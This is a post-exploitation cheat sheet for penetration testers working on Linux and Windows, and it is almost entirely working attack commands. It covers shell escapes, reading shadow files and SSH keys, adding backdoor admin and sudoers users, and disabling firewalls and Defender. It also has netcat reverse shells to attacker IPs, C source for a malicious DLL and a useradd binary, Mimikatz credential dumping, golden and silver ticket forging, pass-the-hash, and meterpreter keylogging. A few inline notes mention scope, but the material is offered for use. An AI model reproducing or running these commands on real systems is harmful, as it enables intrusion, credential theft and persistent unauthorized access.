Post exploitation
Local Enum **Tools** https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh https://github.com/mbahadou/postenum/blob/master/postenum.sh https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32 https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64 https://gtfobins.github.io/ # Spawning shell (upgrade a dumb shell to a TTY) python -c 'import pty; pty.spawn("/bin/bash")' python -c 'import pty; pty.spawn("/bin/sh")' (from a python prompt) import os; os.system('/bin/bash') /bin/sh -i perl -e 'exec "/bin/sh";' ruby: exec "/bin/sh" lua: os.execute('/bin/sh') (From within vi) :!bash or :set shell=/bin/bash then :shell (From within nmap, old --interactive mode only) !sh # Access to more binaries export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin # Download files from attacker wget http://10.11.1.111:8080/ -r; mv 10.11.1.111:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linpeas.sh postenum.sh pspy32 pspy64 # Enum scripts ./LinEnum.sh -t -k password -r LinEnum.txt ./postenum.sh ./linpeas.sh ./pspy64 (or ./pspy32 on 32-bit; watches process/cron activity without root) # Common writable directories /tmp /var/tmp /dev/shm # Add user to sudoers (needs root; noisy and easy to spot, so only where persistence is in scope) useradd hacker passwd hacker echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers # a syntax error in /etc/sudoers breaks sudo for everyone: validate with visudo -c, or write a separate file under /etc/sudoers.d/ instead # sudo permissions sudo -l -l # journalctl: if you can run it as root (e.g. via sudo), run it in a small terminal so the output is paged through less, then type !/bin/sh at the pager prompt # Crons crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root cat /etc/frontal cat /etc/anacron systemctl list-timers --all # Common info uname -a env id cat /proc/version cat /etc/issue cat /etc/passwd cat /etc/group cat /etc/shadow cat /etc/hosts # Users with login (nologin and false shells are both non-interactive) grep -vE "nologin|false" /etc/passwd # Network info cat /proc/net/arp cat /proc/net/fib_trie cat /proc/net/fib_trie | grep "|--" | egrep -v "0.0.0.0| 127." 
awk '/32 host/ { print f } {f=$2}' <<< "$(</proc/net/fib_trie)" # Netstat without netstat (plain form of the base64 blob below; POSIX awk has no hex conversion, hence the hand-rolled hextodec) awk 'function hextodec(str,ret,n,i,k,c){ ret = 0; n = length(str); for (i = 1; i <= n; i++) { c = tolower(substr(str, i, 1)); k = index("123456789abcdef", c); ret = ret * 16 + k }; return ret } function getIP(str,ret){ ret=hextodec(substr(str,index(str,":")-2,2)); for (i=5; i>0; i-=2) { ret = ret"."hextodec(substr(str,i,2)) }; ret = ret":"hextodec(substr(str,index(str,":")+1,4)); return ret } NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp # Netstat without netstat 2 (the same script, base64-encoded; the trailing "qtc" looks like copy corruption and base64 -d may reject it, and "base64 -d | sh" is a well-known EDR/auditd detection pattern, so prefer the plain form above) echo "YXdrICdmdW5jdGlvbiBoZXh0b2RlYyhzdHIscmV0LG4saSxrLGMpewogICAgcmV0ID0gMAogICAgbiA9IGxlbmd0aChzdHIpCiAgICBmb3IgKGkgPSAxOyBpIDw9IG47IGkrKykgewogICAgICAgIGMgPSB0b2xvd2VyKHN1YnN0cihzdHIsIGksIDEpKQogICAgICAgIGsgPSBpbmRleCgiMTIzNDU2Nzg5YWJjZGVmIiwgYykKICAgICAgICByZXQgPSByZXQgKiAxNiArIGsKICAgIH0KICAgIHJldHVybiByZXQKfQpmdW5jdGlvbiBnZXRJUChzdHIscmV0KXsKICAgIHJldD1oZXh0b2RlYyhzdWJzdHIoc3RyLGluZGV4KHN0ciwiOiIpLTIsMikpOyAKICAgIGZvciAoaT01OyBpPjA7IGktPTIpIHsKICAgICAgICByZXQgPSByZXQiLiJoZXh0b2RlYyhzdWJzdHIoc3RyLGksMikpCiAgICB9CiAgICByZXQgPSByZXQiOiJoZXh0b2RlYyhzdWJzdHIoc3RyLGluZGV4KHN0ciwiOiIpKzEsNCkpCiAgICByZXR1cm4gcmV0Cn0gCk5SID4gMSB7e2lmKE5SPT0yKXByaW50ICJMb2NhbCAtIFJlbW90ZSI7bG9jYWw9Z2V0SVAoJDIpO3JlbW90ZT1nZXRJUCgkMyl9e3ByaW50IGxvY2FsIiAtICJyZW1vdGV9fScgL3Byb2MvbmV0L3RjcCAKqtc" | base64 -d | sh # Nmap without nmap (bash only: /dev/tcp is a bash feature, not /bin/sh; the timeout keeps filtered ports from hanging the loop) for ip in {1..5}; do for port in {21,22,5000,8000,3306}; do timeout 1 bash -c "echo >/dev/tcp/172.18.0.$ip/$port" 2>/dev/null && echo "172.18.0.$ip port $port is open"; done; done # Open ports without netstat (strtonum is a gawk extension; on mawk/busybox awk use the hextodec version above) grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}' # Check ssh files: cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat ~/.ssh/id_ed25519 cat ~/.ssh/id_ecdsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key # SUID find / -perm -4000 -type f 2>/dev/null # ALL PERMS find / -perm -777 
-type f 2>/dev/null # SUID for current user find / -perm /u=s -user "$(whoami)" 2>/dev/null find / -user root -perm -4000 -print 2>/dev/null # Writables for current user/group (-user only lists files you own; -writable tests your effective access, including group and ACL grants) find / -writable -type f 2>/dev/null find / -perm /u=w -user "$(whoami)" 2>/dev/null find / -perm /u+w,g+w -type f -user "$(whoami)" 2>/dev/null find / -perm /u+w -user "$(whoami)" 2>/dev/null # Dirs with +w perms for current u/g find / -writable -type d 2>/dev/null find / -perm /u=w -type d -user "$(whoami)" 2>/dev/null find / -perm /u+w,g+w -type d -user "$(whoami)" 2>/dev/null # Port Forwarding # Chisel (the server belongs on the ATTACKER: with --reverse, a client's R:socks makes the server listen on 127.0.0.1:1080 and route that traffic out through the client, i.e. through the victim) # Attacker machine: chisel server --auth "test:123" -p 443 --reverse # Victim machine (10.10.10.10 = attacker): ./chisel client --auth "test:123" 10.10.10.10:443 R:socks # Dynamic Port Forwarding: # Attacker machine: ssh -D 9050 user@host # Attacker machine Burp Proxy - SOCKS Proxy: Mark “Override User Options” Mark Use Socks Proxy: SOCKS host:127.0.0.1 SOCKS port:9050 # Tunneling Target must have SSH running for this to work 1. Create SSH Tunnel: ssh -D localhost:<local_port> -f -N <user>@<target> -p <ssh_port> 2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf) 3. Add the following line into the config: socks5 127.0.0.1 <local_port> 4. Run commands through the tunnel: proxychains <command> # SShuttle # https://github.com/sshuttle/sshuttle sshuttle -r root@172.21.0.0 10.2.2.0/24 # netsh port forwarding netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80 netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000 Escaping restricted shell # First check your shell echo $SHELL # and commands export # vim # List files :!/bin/ls -l .b* # Set new shell :set shell=/bin/sh :shell # or :!/bin/sh # ed !'/bin/sh' # ne -> Load Prefs -> Navigate everywhere # more/less/man/pinfo !'sh' # links -> File OS Shell # lynx -> "o" for options -> configure default editor e.g. vim lynx --editor=/usr/bin/vim www.google.com # or export EDITOR=/usr/bin/vim # navigate to https://translate.google.com/ go to text box, ENTER and F4 # mutt ! 
# find find / -name "root" -exec /bin/sh \; find / -name "root" -exec /bin/awk 'BEGIN {system("/bin/sh")}' \; # nmap < 2009/05 --interactive !sh # awk awk 'BEGIN {system("/bin/sh")}' # expect expect -c 'spawn sh' -i # python python -c 'import pty; pty.spawn("/bin/sh")' # ruby irb exec '/bin/sh' # perl perl -e 'system("sh -i");' perl -e 'exec("sh -i");' # php -a exec("sh -i"); # Only Rbash echo x | xargs -Iy sh -c 'exec sh 0<&1' # Emacs Mod-! /bin/sh # cp cp /bin/sh /dev/shm/sh; /dev/shm/sh # export export SHELL=/bin/sh; export PATH=/bin:/usr/bin:$PATH # FTP/Telnet !/bin/sh # GDB !/bin/sh # eval eval echo echo {o..q}ython\; # tee echo '/bin/rm /home/user/.bashrc' | tee '/home/user/bin/win';win; echo 'export SHELL=/bin/sh' | tee '/home/user/.bashrc' # declare declare -n PATH; export PATH=/bin;bash -i BASH_CMDS[shell]=/bin/bash;shell -i # nano nano -s /bin/sh # Ctrl+T # SSH ssh user@host -t "bash --noprofile -i" ssh user@host -t "() { :; }; sh -i " Loot # Linux cat /etc/passwd cat /etc/shadow unshadow passwd shadow > unshadowed.txt john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt ifconfig -a arp -a tcpdump -i any -s0 -w capture.pcap tcpdump -i eth0 -w capture -n -U -s 0 src not 10.11.1.111 and dst not 10.11.1.111 tcpdump -vv -i eth0 src not 10.11.1.111 and dst not 10.11.1.111 .bash_history /var/mail /var/spool/mail echo $DESKTOP_SESSION echo $XDG_CURRENT_DESKTOP echo $GDMSESSION Windows Local enum # Tools https://github.com/S3cur3Th1sSh1t/WinPwn https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASbat/winPEAS.bat https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/privesc/PowerUp.ps1 https://github.com/S3cur3Th1sSh1t/PowerSharpPack https://github.com/Flangvik/SharpCollection https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://github.com/dafthack/DomainPasswordSpray https://github.com/CredDefense/CredDefense https://github.com/dafthack/MailSniper 
https://github.com/itm4n/PrivescCheck https://lolbas-project.github.io/# # Basic info systeminfo set Get-ChildItem Env: | ft Key,Value hostname net user net user user1 query user Get-LocalUser | ft Name,Enabled,LastLogon Get-ChildItem C:\Users -Force | select Name net use wmic logicaldisk get caption,description,providername Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root net localgroup accesschk.exe -accepteula -uwcqv "Authenticated Users" * netsh firewall show state netsh firewall show config whoami /priv echo %USERNAME% $env:UserName wmic qfe qwinsta query user net localgroup Get-LocalGroup | ft Name # Set path set PATH=%PATH%;C:\xampp\php dir /a -> Show hidden & unhidden files dir /Q -> Show file owner (use icacls <path> for the actual permissions) # check .net version: gci 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | gp -name Version -EA 0 | where { $_.PSChildName -match '^(?!S)\p{L}'} | select PSChildName, Version get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "Users Path" # Passwords # Windows autologin reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # VNC reg query "HKCU\Software\ORL\WinVNC3\Password" # SNMP Parameters reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" # Putty reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Search for password in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s python secretsdump.py -just-dc-ntlm htb.hostname/username@10.10.1.10 secretsdump.py -just-dc htb.hostname/username@10.10.1.10 > dump.txt # Add RDP user and disable firewall (every step below is loud and leaves durable artifacts; only where the engagement scope allows it) net user test Test123! 
/add net localgroup Administrators test /add net localgroup "Remote Desktop Users" test /ADD # Turn firewall off and enable RDP (on current Windows the Defender service is protected and sc stop WinDefend is denied even to administrators; UserAuthentication=0 turns off NLA for RDP) sc stop WinDefend netsh advfirewall show allprofiles netsh advfirewall set allprofiles state off netsh firewall set opmode disable reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f # Dump Firefox data # Looking for Firefox Get-Process firefox ./procdump64.exe -ma <firefox_pid> Select-String -Path .\*.dmp -Pattern 'password' > 1.txt type 1.txt | findstr /s /i "admin" # PS Bypass Policy Set-ExecutionPolicy Unrestricted powershell.exe -exec bypass Set-ExecutionPolicy Bypass -Scope Process # Convert passwords to secure strings and output to an XML file (Export-Clixml wraps the SecureString with DPAPI, so the file only decrypts for the same user on the same host): $secpasswd = ConvertTo-SecureString "VMware1!" -AsPlainText -Force $mycreds = New-Object System.Management.Automation.PSCredential ("administrator", $secpasswd) $mycreds | export-clixml -path c:\temp\password.xml # PS sudo $pw= convertto-securestring "EnterPasswordHere" -asplaintext -force $pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw $script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat" Start-Process powershell -Credential $pp -ArgumentList "-noprofile -command &{Start-Process '$script' -verb Runas}" # double quotes so $script is expanded here; inside single quotes the child shell sees an undefined variable powershell -ExecutionPolicy Bypass -File xyz.ps1 # PS runas # START PROCESS $username='someUser' $password='somePassword' $securePassword = ConvertTo-SecureString $password -AsPlainText -Force $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword Start-Process .\nc.exe -ArgumentList '10.10.xx.xx 4445 -e cmd.exe' -Credential $credential # INVOKE COMMAND $pass = ConvertTo-SecureString 'l33th4x0rhector' -AsPlainText -Force; $Credential = New-Object 
System.Management.Automation.PSCredential ("fidelity\hector", $pass);Invoke-Command -ComputerName 'Fidelity' -ScriptBlock {C:\inetpub\wwwroot\uploads\nc.exe -e cmd 10.10.15.121 443} -credential $Credential # Tasks schtasks /query /fo LIST /v type c:\WINDOWS\SchedLgU.Txt (legacy Task Scheduler log, XP/2003 era) python3 atexec.py Domain/Administrator:<password>@<target_ip> systeminfo # Useradd bin (the angle-bracket placeholders and include names were stripped by the HTML rendering; restored here) #include <stdlib.h> /* system, NULL, EXIT_FAILURE */ int main () { int i; i=system ("net user <username> <password> /add && net localgroup administrators <username> /add"); return 0; } # Compile i686-w64-mingw32-gcc -o useradd.exe useradd.c # WinXP sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.1.111 4343 -e C:\WINDOWS\System32\cmd.exe" sc config upnphost obj= ".\LocalSystem" password= "" sc qc upnphost sc config upnphost depend= "" net start upnphost # WinRM Port Forwarding plink -l LOCALUSER -pw LOCALPASSWORD LOCALIP -R 5985:127.0.0.1:5985 -P 221 # DLL Injection (cmd.exe chains commands with && not ; and the first net user needs /add; exit(0) kills the host process, so this is single-shot) #include <windows.h> #include <stdlib.h> int owned() { WinExec("cmd.exe /c net user username Password01 /add && net localgroup administrators username /add", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { owned(); return TRUE; } # x64 compilation: x86_64-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL main.cpp x86_64-w64-mingw32-g++ -shared -o main.dll main.o -Wl,--out-implib,main.a # Generate Silver Tickets with Impacket (the key is the SERVICE account's, usually the machine account, not krbtgt's): python3 ticketer.py -nthash <service_account_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name> python3 ticketer.py -aesKey <service_account_aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name> # Generate Golden Tickets (krbtgt key): python3 ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name> python3 ticketer.py -aesKey <krbtgt_aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name> # Credential Access with Secretsdump impacket-secretsdump username@target-ip -dc-ip target-ip # AMSI (Antimalware Scan Interface) bypass generator https://amsi.fail/ Interesting files C:\windows\repair\sam 
C:\windows\System32\config\RegBack\SAM C:\windows\repair\system C:\windows\repair\software C:\windows\repair\security C:\windows\debug\NetSetup.log C:\windows\iis5.log C:\windows\iis6.log C:\windows\iis7.log C:\windows\system32\logfiles\httperr\httperr1.log C:\sysprep.inf C:\sysprep\sysprep.inf C:\sysprep\sysprep.xml C:\windows\Panther\Unattended.xml C:\inetpub\wwwroot\Web.config C:\windows\system32\config\AppEvent.Evt C:\windows\system32\config\SecEvent.Evt C:\windows\system32\config\default.sav C:\windows\system32\config\security.sav C:\windows\system32\config\software.sav C:\windows\system32\config\system.sav C:\windows\system32\inetsrv\config\applicationHost.config C:\windows\system32\inetsrv\config\schema\ASPNET_schema.xml C:\windows\System32\drivers\etc\hosts C:\windows\System32\drivers\etc\networks C:\windows\system32\config\SAM Mimikatz # SAM privilege::debug token::elevate lsadump::sam # Windows Credential Manager privilege::debug sekurlsa::credman # LSASS privilege::debug sekurlsa::minidump C:\Users\raj\Desktop\lsass.DMP sekurlsa::logonpasswords #or privilege::debug lsadump::lsa /patch # WDigest privilege::debug sekurlsa::wdigest Privilege Escalation # Check groups and privs whoami /priv # Interesting accounts - Administrators, Local System - Built-in groups (Backup, Server, Printer Operators) - Local/network service accounts - Managed Service and Virtual Accounts - Third party application users - Misconfigured users # Interesting privileges - SeDebugPrivilege Create a new process and set the parent process a privileged process https://github.com/decoder-it/psgetsystem - SeRestorePrivilege Can write files anywhere, overwrites files, protected system files Modify a service running as Local and startable by all users and get a SYSTEM shell - SeBackupPrivilege Can backup Windows registry and use third party tools for extracting local NTLM hashes Members of “Backup Operators” can logon locally on a Domain Controller and backup the NTDS.DIT - 
SeTakeOwnershipPrivilege Can take ownership of any securable object in the system - SeTcbPrivilege Can logon as a different user without any credentials in order to get a security Impersonation Token by using the LsaLogonUser() function - SeCreateTokenPrivilege Can create a custom token with all privileges and group membership you need (works up to Windows 10 1809, where it was restricted) But if you set the AuthenticationId to ANONYMOUS_LOGON_UID (0x3e6) you can still impersonate on Win >= 1809 and use a subset of API calls: CreateFile(), RegSetKey() - SeLoadDriver Privilege "Printer operators" have this privilege on a DC Determines which users can dynamically load and unload device drivers or other code into kernel mode - SeImpersonatePrivilege & SeAssignPrimaryTokenPrivilege Permit impersonating any access token you can get a handle to ** If you have SeBackup & SeRestore privileges (Backup Operators group) you can set permission and ownership on each file & folder ** Loot hostname && whoami.exe && ipconfig /all wce32.exe -w wce64.exe -w fgdump.exe # Loot passwords without tools (needs admin; parse the hives offline with secretsdump.py -sam sam_backup -security security_backup -system system LOCAL) reg.exe save hklm\sam c:\sam_backup reg.exe save hklm\security c:\security_backup reg.exe save hklm\system c:\system ipconfig /all route print # What other machines have been connected arp -a # Meterpreter run packetrecorder -li run packetrecorder -i 1 #Meterpreter search -f *.txt search -f *.zip search -f *.doc search -f *.xls search -f config* search -f *.rar search -f *.docx search -f *.sql hashdump keyscan_start keyscan_dump keyscan_stop webcam_snap load mimikatz msv (the mimikatz extension is deprecated in current Metasploit; use load kiwi then creds_msv) # How to cat files in meterpreter cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt # Recursive search dir /s secretsdump.py -just-dc htb.hostname/username@10.10.1.10 > dump.txt .\mimikatz.exe "lsadump::dcsync /user:Administrator" "exit" (needs DCSync replication rights on the domain) # Mimikatz # Run these from an elevated (local admin) context: privilege::debug then token::elevate takes the session to SYSTEM, which lsadump::sam needs. 
mimikatz # privilege::debug mimikatz # token::whoami mimikatz # token::elevate mimikatz # lsadump::sam mimikatz # sekurlsa::logonpasswords ## Pass The Hash (spawns a new process whose Kerberos/NTLM credentials are the given hash) mimikatz # sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash # Inject a forged or stolen ticket (.kirbi) into the current session mimikatz # kerberos::ptt <ticket_kirbi_file> # Generating a silver ticket (the key is the SERVICE account's, usually the machine account, not krbtgt's; add /ptt to inject directly, otherwise a .kirbi is written for kerberos::ptt) # AES 256 Key: mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<service_account_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname> # AES 128 Key: mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<service_account_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname> # NTLM mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<service_account_ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname> # Generating a Golden Ticket (krbtgt key; AES keys are less conspicuous than RC4 in modern domains) # AES 256 Key: mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> # AES 128 Key: mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> # NTLM: mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name> # Lsassy (remote lsass/mimikatz dump reader) (requires impacket) git clone https://github.com/hackndo/lsassy cd lsassy && sudo python3 setup.py install lsassy example.com/Administrator:s3cr3tpassw0rd@victim-pc # Lsass dump https://github.com/outflanknl/Dumpert